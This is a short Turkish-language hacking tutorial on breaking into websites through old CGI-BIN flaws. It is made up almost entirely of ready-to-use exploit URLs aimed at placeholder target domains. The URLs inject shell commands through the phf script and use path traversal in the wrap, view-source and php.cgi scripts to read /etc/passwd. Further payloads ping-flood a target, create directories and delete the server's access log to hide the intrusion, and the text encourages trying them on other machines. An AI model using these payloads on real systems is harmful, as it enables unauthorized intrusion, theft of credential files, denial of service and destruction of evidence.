WEBSAYFASI HACK Sayfa Hackleme : a- (Phf scripti): Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun uzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadir. Tüm dünyada pek cok hacker'in kullandığı cgi-bin güvenlik açığı: http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makinalari üzerinde denemekte yarar var. b- (Wrap Scripti): Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da söyle istismar edebiliriz: http://www.kiracağimizadres.com.tr/cgi-bin/wrap?../../../etc/passwd http://www.kiracağimizadres.com.tr/cgi-bin/wrap?%0als (...) Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !! c- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var) http://www.kiracağimizadres.com.tr/cgi-bin/view-source?../../../etc/passwd ya da http://www.kiracağimizadres.com.tr/cgi-bin/view-source?%1b or %0a %20 d- (php.cgi Scripti): http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd e- Diğer Denenebilir Scriptler: http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s %205000%20ip%20to%20shoot http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate http://www.kiracağimizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log |